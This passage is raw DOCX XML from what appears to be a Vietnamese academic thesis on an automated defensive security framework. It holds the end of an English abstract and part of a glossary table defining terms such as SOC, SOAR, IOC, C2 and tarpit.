        <w:t>Empirical evaluations conducted across both controlled Red Team lab scenarios and open-Internet honeynet deployments demonstrate that the proposed framework slashes the Mean Time to Respond (MTTR) from 15-20 minutes down to 1.8-2.5 seconds, neutralizes over 98% of brute-force botnet traffic via aggressive tarpitting, and delivers granular adversarial profiling without violating cyber legal boundaries. This work bridges the gap between passive telemetry collection and autonomous threat neutralization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>DANH MỤC THUẬT NGỮ VÀ TỪ VIẾT TẮT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 0.1: Bảng giải nghĩa các thuật ngữ viết tắt trong đồ án</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Thuật ngữ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tên đầy đủ tiếng Anh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ý nghĩa / Diễn giải tiếng Việt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security Operations Center</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Trung tâm điều hành và giám sát an ninh mạng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SOAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Security Orchestration, Automation, and Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Nền tảng điều phối, tự động hóa và phản ứng an ninh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>IOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Indicators of Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Dấu hiệu chỉ điểm xâm nhập (IP, Hash, Domain, URL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>TTPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tactics, Techniques, and Procedures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Chiến thuật, Kỹ thuật và Quy trình tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>OSINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Open Source Intelligence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tình báo an ninh từ nguồn mở</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Adversarial Tactics, Techniques, and Common Knowledge</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Khung cơ sở tri thức chiến thuật và kỹ thuật của kẻ tấn công</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Secure Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Giao thức điều khiển máy chủ dòng lệnh mã hóa an toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ASN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Autonomous System Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Số hiệu hệ thống tự trị của các nhà cung cấp mạng ISP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Application Programming Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Giao diện lập trình ứng dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>C2 / C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Command and Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Máy chủ điều khiển mạng máy tính ma (Botnet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MTTR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mean Time to Respond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thời gian trung bình để phản ứng và xử lý sự cố</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MTTD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mean Time to Detect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thời gian trung bình để phát hiện sự cố an ninh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tarpit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
